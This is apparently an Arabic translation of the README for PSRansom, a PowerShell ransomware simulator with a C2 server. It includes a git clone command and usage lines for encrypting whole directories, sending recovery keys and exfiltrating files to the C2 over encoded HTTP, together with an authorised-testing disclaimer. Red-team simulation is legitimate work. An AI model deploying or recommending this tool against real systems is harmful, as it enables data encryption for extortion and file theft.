
محاكي برنامج فدية PowerShell مع خادم C2

PSRansom هي أداة محاكاة لبرامج الفدية (Ransomware) باستخدام PowerShell مع قدرات خادم التحكم (C2). تساعدك هذه الأداة على محاكاة عملية تشفير برنامج فدية عام على أي نظام يحتوي على PowerShell مثبتًا. بفضل خادم C2 المدمج، يمكنك استخراج الملفات واستقبال معلومات العميل عبر HTTP. جميع الاتصالات بين العنصرين تكون مشفرة أو مشفرة (encoded) لتجنب اكتشافها بواسطة آليات فحص حركة المرور، على الرغم من عدم استخدام HTTPS في أي وقت.
يوصى باستنساخ المستودع بالكامل أو تحميل الملف المضغوط. يمكنك القيام بذلك عن طريق تشغيل الأمر التالي:
git clone https://github.com/JoelGMSec/PSRansom
.\PSRansom -h
____ ____ ____
| _ \/ ___|| _ \ __ _ _ __ ___ ___ _ __ ___
| |_) \___ \| |_) / _' | '_ \/ __|/ _ \| '_ ' _ \
| __/ ___) | _ < (_| | | | \__ \ (_) | | | | | |
|_| |____/|_| \_\__,_|_| |_|___/\___/|_| |_| |_|
----------------- by @JoelGMSec ----------------
معلومات: تساعدك هذه الأداة على محاكاة عملية تشفير برنامج فدية عام
في PowerShell مع قدرات C2
الاستخدام: .\PSRansom.ps1 -e Directory -s C2Server -p C2Port
يقوم بتشفير جميع الملفات وإرسال مفتاح الاسترداد إلى خادم C2
استخدم -x لاستخراج الملفات وفك تشفيرها على خادم C2
.\PSRansom.ps1 -d Directory -k RecoveryKey
فك تشفير جميع الملفات باستخدام سلسلة مفتاح الاسترداد
تحذير: سيتم إرسال جميع المعلومات إلى خادم C2 دون أي تشفير
تحتاج إلى مفتاح استرداد تم إنشاؤه مسبقًا لاسترداد الملفات
https://darkbyte.net/psransom-simulando-un-ransomware-generico-con-powershell
هذا المشروع مرخص بموجب رخصة GNU 3.0 - راجع ملف LICENSE لمزيد من التفاصيل.
تم إنشاء هذه الأداة وتصميمها من الصفر بواسطة Joel Gámez Molina // @JoelGMSec
هذا البرنامج لا يقدم أي نوع من الضمان. استخدامه حصري للبيئات التعليمية و/أو اختبارات الأمن بموافقة العميل المقابلة. لست مسؤولاً عن إساءة استخدامه أو عن أي ضرر محتمل ناتج عنه. لمزيد من المعلومات، يمكنك العثور علي على تويتر باسم @JoelGMSec وعلى مدونتي darkbyte.net.
يمكنك دعم عملي بشراء فنجان قهوة لي: